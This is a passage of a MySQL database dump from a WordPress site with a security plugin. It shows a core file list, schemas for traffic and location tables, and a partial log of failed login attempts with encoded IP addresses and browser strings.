(7281,'wp-includes/js/wp-util.min.js'),(7282,'wp-includes/js/wpdialog.js'),(7283,'wp-includes/js/wpdialog.min.js'),(7284,'wp-includes/js/wplink.js'),(7285,'wp-includes/js/wplink.min.js'),(7286,'wp-includes/js/zxcvbn-async.js'),(7287,'wp-includes/js/zxcvbn-async.min.js'),(7288,'wp-includes/js/zxcvbn.min.js'),(7289,'wp-includes/kses.php'),(7290,'wp-includes/l10n.php'),(7291,'wp-includes/link-template.php'),(7292,'wp-includes/load.php'),(7293,'wp-includes/locale.php'),(7294,'wp-includes/media-template.php'),(7295,'wp-includes/media.php'),(7296,'wp-includes/meta.php'),(7297,'wp-includes/ms-blogs.php'),(7298,'wp-includes/ms-default-constants.php'),(7299,'wp-includes/ms-default-filters.php'),(7300,'wp-includes/ms-deprecated.php'),(7301,'wp-includes/ms-files.php'),(7302,'wp-includes/ms-functions.php'),(7303,'wp-includes/ms-load.php'),(7304,'wp-includes/ms-network.php'),(7305,'wp-includes/ms-settings.php'),(7306,'wp-includes/ms-site.php'),(7307,'wp-includes/nav-menu-template.php'),(7308,'wp-includes/nav-menu.php'),(7309,'wp-includes/option.php'),(7310,'wp-includes/pluggable-deprecated.php'),(7311,'wp-includes/pluggable.php'),(7312,'wp-includes/plugin.php'),(7313,'wp-includes/pomo/entry.php'),(7314,'wp-includes/pomo/mo.php'),(7315,'wp-includes/pomo/plural-forms.php'),(7316,'wp-includes/pomo/po.php'),(7317,'wp-includes/pomo/streams.php'),(7318,'wp-includes/pomo/translations.php'),(7319,'wp-includes/post-formats.php'),(7320,'wp-includes/post-template.php'),(7321,'wp-includes/post-thumbnail-template.php'),(7322,'wp-includes/post.php'),(7323,'wp-includes/query.php'),(7324,'wp-includes/random_compat/byte_safe_strings.php'),(7325,'wp-includes/random_compat/cast_to_int.php'),(7326,'wp-includes/random_compat/error_polyfill.php'),(7327,'wp-includes/random_compat/random.php'),(7328,'wp-includes/random_compat/random_bytes_com_dotnet.php'),(7329,'wp-includes/random_compat/random_bytes_dev_urandom.php'),(7330,'wp-includes/random_compat/random_bytes_libsodium.php'),(7331,'wp-includes/random_compat/random_bytes_libsodium_legacy.php'),(7332,'wp-includes/random_compat/random_bytes_mcrypt.php'),(7333,'wp-includes/random_compat/random_int.php'),(7334,'wp-includes/registration-functions.php'),(7335,'wp-includes/registration.php'),(7336,'wp-includes/rest-api/class-wp-rest-request.php'),(7337,'wp-includes/rest-api/class-wp-rest-response.php'),(7338,'wp-includes/rest-api/class-wp-rest-server.php'),(7339,'wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php'),(7340,'wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php'),(7341,'wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php'),(7342,'wp-includes/rest-api/endpoints/class-wp-rest-block-directory-controller.php'),(7343,'wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php'),(7344,'wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php'),(7345,'wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php'),(7346,'wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php'),(7347,'wp-includes/rest-api/endpoints/class-wp-rest-controller.php'),(7348,'wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php'),(7349,'wp-includes/rest-api/endpoints/class-wp-rest-post-statuses-controller.php'),(7350,'wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php'),(7351,'wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php'),(7352,'wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php'),(7353,'wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php'),(7354,'wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php'),(7355,'wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php'),(7356,'wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php'),(7357,'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php'),(7358,'wp-includes/rest-api/endpoints/class-wp-rest-themes-controller.php'),(7359,'wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php'),(7360,'wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php'),(7361,'wp-includes/rest-api/fields/class-wp-rest-meta-fields.php'),(7362,'wp-includes/rest-api/fields/class-wp-rest-post-meta-fields.php'),(7363,'wp-includes/rest-api/fields/class-wp-rest-term-meta-fields.php'),(7364,'wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php'),(7365,'wp-includes/rest-api/search/class-wp-rest-post-format-search-handler.php'),(7366,'wp-includes/rest-api/search/class-wp-rest-post-search-handler.php'),(7367,'wp-includes/rest-api/search/class-wp-rest-search-handler.php'),(7368,'wp-includes/rest-api/search/class-wp-rest-term-search-handler.php'),(7369,'wp-includes/rest-api.php'),(7370,'wp-includes/revision.php'),(7371,'wp-includes/rewrite.php'),(7372,'wp-includes/rss-functions.php'),(7373,'wp-includes/rss.php'),(7374,'wp-includes/script-loader.php'),(7375,'wp-includes/session.php'),(7376,'wp-includes/shortcodes.php'),(7377,'wp-includes/sitemaps/class-wp-sitemaps-index.php'),(7378,'wp-includes/sitemaps/class-wp-sitemaps-provider.php'),(7379,'wp-includes/sitemaps/class-wp-sitemaps-registry.php'),(7380,'wp-includes/sitemaps/class-wp-sitemaps-renderer.php'),(7381,'wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php'),(7382,'wp-includes/sitemaps/class-wp-sitemaps.php'),(7383,'wp-includes/sitemaps/providers/class-wp-sitemaps-posts.php'),(7384,'wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php'),(7385,'wp-includes/sitemaps/providers/class-wp-sitemaps-users.php'),(7386,'wp-includes/sitemaps.php'),(7387,'wp-includes/sodium_compat/LICENSE'),(7388,'wp-includes/sodium_compat/autoload-php7.php'),(7389,'wp-includes/sodium_compat/autoload.php'),(7390,'wp-includes/sodium_compat/composer.json'),(7391,'wp-includes/sodium_compat/lib/constants.php'),(7392,'wp-includes/sodium_compat/lib/namespaced.php'),(7393,'wp-includes/sodium_compat/lib/php72compat.php'),(7394,'wp-includes/sodium_compat/lib/php72compat_const.php'),(7395,'wp-includes/sodium_compat/lib/sodium_compat.php'),(7396,'wp-includes/sodium_compat/namespaced/Compat.php'),(7397,'wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php'),(7398,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/Ctx.php'),(7399,'wp-includes/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php'),(7400,'wp-includes/sodium_compat/namespaced/Core/ChaCha20.php'),(7401,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php'),(7402,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php'),(7403,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php'),(7404,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php'),(7405,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php'),(7406,'wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php'),(7407,'wp-includes/sodium_compat/namespaced/Core/Curve25519/H.php'),(7408,'wp-includes/sodium_compat/namespaced/Core/Curve25519.php'),(7409,'wp-includes/sodium_compat/namespaced/Core/Ed25519.php'),(7410,'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php'),(7411,'wp-includes/sodium_compat/namespaced/Core/HSalsa20.php'),(7412,'wp-includes/sodium_compat/namespaced/Core/Poly1305/State.php'),(7413,'wp-includes/sodium_compat/namespaced/Core/Poly1305.php'),(7414,'wp-includes/sodium_compat/namespaced/Core/Salsa20.php'),(7415,'wp-includes/sodium_compat/namespaced/Core/SipHash.php'),(7416,'wp-includes/sodium_compat/namespaced/Core/Util.php'),(7417,'wp-includes/sodium_compat/namespaced/Core/X25519.php'),(7418,'wp-includes/sodium_compat/namespaced/Core/XChaCha20.php'),(7419,'wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php'),(7420,'wp-includes/sodium_compat/namespaced/Crypto.php'),(7421,'wp-includes/sodium_compat/namespaced/File.php'),(7422,'wp-includes/sodium_compat/src/Compat.php'),(7423,'wp-includes/sodium_compat/src/Core/BLAKE2b.php'),(7424,'wp-includes/sodium_compat/src/Core/Base64/Common.php'),(7425,'wp-includes/sodium_compat/src/Core/Base64/Original.php'),(7426,'wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php'),(7427,'wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php'),(7428,'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php'),(7429,'wp-includes/sodium_compat/src/Core/ChaCha20.php'),(7430,'wp-includes/sodium_compat/src/Core/Curve25519/Fe.php'),(7431,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php'),(7432,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php'),(7433,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php'),(7434,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php'),(7435,'wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php'),(7436,'wp-includes/sodium_compat/src/Core/Curve25519/H.php'),(7437,'wp-includes/sodium_compat/src/Core/Curve25519/README.md'),(7438,'wp-includes/sodium_compat/src/Core/Curve25519.php'),(7439,'wp-includes/sodium_compat/src/Core/Ed25519.php'),(7440,'wp-includes/sodium_compat/src/Core/HChaCha20.php'),(7441,'wp-includes/sodium_compat/src/Core/HSalsa20.php'),(7442,'wp-includes/sodium_compat/src/Core/Poly1305/State.php'),(7443,'wp-includes/sodium_compat/src/Core/Poly1305.php'),(7444,'wp-includes/sodium_compat/src/Core/Salsa20.php'),(7445,'wp-includes/sodium_compat/src/Core/SecretStream/State.php'),(7446,'wp-includes/sodium_compat/src/Core/SipHash.php'),(7447,'wp-includes/sodium_compat/src/Core/Util.php'),(7448,'wp-includes/sodium_compat/src/Core/X25519.php'),(7449,'wp-includes/sodium_compat/src/Core/XChaCha20.php'),(7450,'wp-includes/sodium_compat/src/Core/XSalsa20.php'),(7451,'wp-includes/sodium_compat/src/Core32/BLAKE2b.php'),(7452,'wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php'),(7453,'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php'),(7454,'wp-includes/sodium_compat/src/Core32/ChaCha20.php'),(7455,'wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php'),(7456,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php'),(7457,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php'),(7458,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php'),(7459,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php'),(7460,'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php'),(7461,'wp-includes/sodium_compat/src/Core32/Curve25519/H.php'),(7462,'wp-includes/sodium_compat/src/Core32/Curve25519/README.md'),(7463,'wp-includes/sodium_compat/src/Core32/Curve25519.php'),(7464,'wp-includes/sodium_compat/src/Core32/Ed25519.php'),(7465,'wp-includes/sodium_compat/src/Core32/HChaCha20.php'),(7466,'wp-includes/sodium_compat/src/Core32/HSalsa20.php'),(7467,'wp-includes/sodium_compat/src/Core32/Int32.php'),(7468,'wp-includes/sodium_compat/src/Core32/Int64.php'),(7469,'wp-includes/sodium_compat/src/Core32/Poly1305/State.php'),(7470,'wp-includes/sodium_compat/src/Core32/Poly1305.php'),(7471,'wp-includes/sodium_compat/src/Core32/Salsa20.php'),(7472,'wp-includes/sodium_compat/src/Core32/SecretStream/State.php'),(7473,'wp-includes/sodium_compat/src/Core32/SipHash.php'),(7474,'wp-includes/sodium_compat/src/Core32/Util.php'),(7475,'wp-includes/sodium_compat/src/Core32/X25519.php'),(7476,'wp-includes/sodium_compat/src/Core32/XChaCha20.php'),(7477,'wp-includes/sodium_compat/src/Core32/XSalsa20.php'),(7478,'wp-includes/sodium_compat/src/Crypto.php'),(7479,'wp-includes/sodium_compat/src/Crypto32.php'),(7480,'wp-includes/sodium_compat/src/File.php'),(7481,'wp-includes/sodium_compat/src/PHP52/SplFixedArray.php'),(7482,'wp-includes/sodium_compat/src/SodiumException.php'),(7483,'wp-includes/spl-autoload-compat.php'),(7484,'wp-includes/taxonomy.php'),(7485,'wp-includes/template-loader.php'),(7486,'wp-includes/template.php'),(7487,'wp-includes/theme-compat/comments.php'),(7488,'wp-includes/theme-compat/embed-404.php'),(7489,'wp-includes/theme-compat/embed-content.php'),(7490,'wp-includes/theme-compat/embed.php'),(7491,'wp-includes/theme-compat/footer-embed.php'),(7492,'wp-includes/theme-compat/footer.php'),(7493,'wp-includes/theme-compat/header-embed.php'),(7494,'wp-includes/theme-compat/header.php'),(7495,'wp-includes/theme-compat/sidebar.php'),(7496,'wp-includes/theme.php'),(7497,'wp-includes/update.php'),(7498,'wp-includes/user.php'),(7499,'wp-includes/vars.php'),(7500,'wp-includes/version.php'),(7501,'wp-includes/widgets/class-wp-nav-menu-widget.php'),(7502,'wp-includes/widgets/class-wp-widget-archives.php'),(7503,'wp-includes/widgets/class-wp-widget-calendar.php'),(7504,'wp-includes/widgets/class-wp-widget-categories.php'),(7505,'wp-includes/widgets/class-wp-widget-custom-html.php'),(7506,'wp-includes/widgets/class-wp-widget-links.php'),(7507,'wp-includes/widgets/class-wp-widget-media-audio.php'),(7508,'wp-includes/widgets/class-wp-widget-media-gallery.php'),(7509,'wp-includes/widgets/class-wp-widget-media-image.php'),(7510,'wp-includes/widgets/class-wp-widget-media-video.php'),(7511,'wp-includes/widgets/class-wp-widget-media.php'),(7512,'wp-includes/widgets/class-wp-widget-meta.php'),(7513,'wp-includes/widgets/class-wp-widget-pages.php'),(7514,'wp-includes/widgets/class-wp-widget-recent-comments.php'),(7515,'wp-includes/widgets/class-wp-widget-recent-posts.php'),(7516,'wp-includes/widgets/class-wp-widget-rss.php'),(7517,'wp-includes/widgets/class-wp-widget-search.php'),(7518,'wp-includes/widgets/class-wp-widget-tag-cloud.php'),(7519,'wp-includes/widgets/class-wp-widget-text.php'),(7520,'wp-includes/widgets.php'),(7521,'wp-includes/wlwmanifest.xml'),(7522,'wp-includes/wp-db.php'),(7523,'wp-includes/wp-diff.php'),(7524,'wp-links-opml.php'),(7525,'wp-load.php'),(7526,'wp-login.php'),(7527,'wp-mail.php'),(7528,'wp-settings.php'),(7529,'wp-signup.php'),(7530,'wp-trackback.php'),(7531,'xmlrpc.php');
/*!40000 ALTER TABLE `wp_wfknownfilelist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflivetraffichuman`
--

DROP TABLE IF EXISTS `wp_wflivetraffichuman`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflivetraffichuman` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `identifier` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `expiration` int(10) unsigned NOT NULL,
  PRIMARY KEY (`IP`,`identifier`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflivetraffichuman`
--

LOCK TABLES `wp_wflivetraffichuman` WRITE;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflivetraffichuman` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflocs`
--

DROP TABLE IF EXISTS `wp_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflocs`
--

LOCK TABLES `wp_wflocs` WRITE;
/*!40000 ALTER TABLE `wp_wflocs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wflogins`
--

DROP TABLE IF EXISTS `wp_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=InnoDB AUTO_INCREMENT=462 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wflogins`
--

LOCK TABLES `wp_wflogins` WRITE;
/*!40000 ALTER TABLE `wp_wflogins` DISABLE KEYS */;
INSERT INTO `wp_wflogins` VALUES (1,1,1624368872.121244,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���A�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(2,2,1624368873.591337,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���A�j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(3,3,1624369821.612251,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���ƀ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4,4,1624369830.573246,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ƀ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5,5,1624370882.084891,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6,6,1624370882.680832,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-O#(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(7,7,1624373043.054021,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(8,8,1624373044.003359,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(9,11,1624377568.906674,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��gbH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(10,12,1624377570.448516,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��gbH','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(11,13,1624378018.758817,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(12,14,1624378020.214813,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(13,15,1624378023.976597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(14,16,1624378025.755934,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(15,17,1624378030.935290,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(16,18,1624378032.690795,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(17,19,1624378034.206774,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(18,20,1624378035.487057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(19,21,1624378036.780711,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(20,22,1624378038.396934,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(21,23,1624378044.445902,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(22,24,1624378052.265968,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(23,25,1624378053.353633,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(24,25,1624378053.429240,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(25,26,1624378054.448736,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(26,26,1624378054.524534,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(27,27,1624378055.390618,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(28,28,1624378056.125501,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(29,28,1624378056.211219,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(30,30,1624385521.849695,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��6$�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(31,31,1624385522.125764,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��6$�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(32,32,1624387861.490437,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���	Y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(33,33,1624387861.804700,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���	Y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(34,34,1624389030.086606,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(35,35,1624389030.370453,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Dx1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(36,36,1624395116.106234,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���[m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(37,37,1624395120.300619,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���[m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(38,38,1624397612.622593,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0���G�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(39,39,1624397620.912944,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���G�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(40,40,1624400135.714359,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(41,41,1624400137.464951,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����}�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(42,42,1624403923.404294,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��U�1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(43,43,1624403923.668589,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��U�1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(44,44,1624405303.134359,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��}�Q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(45,45,1624405314.313846,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��}�Q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(46,46,1624408993.212302,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0�����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(47,47,1624408994.151407,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(48,48,1624410334.797755,1,'loginFailInvalidUsername','yorkshirecricketboard',0,'\0\0\0\0\0\0\0\0\0\0��\'a�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; 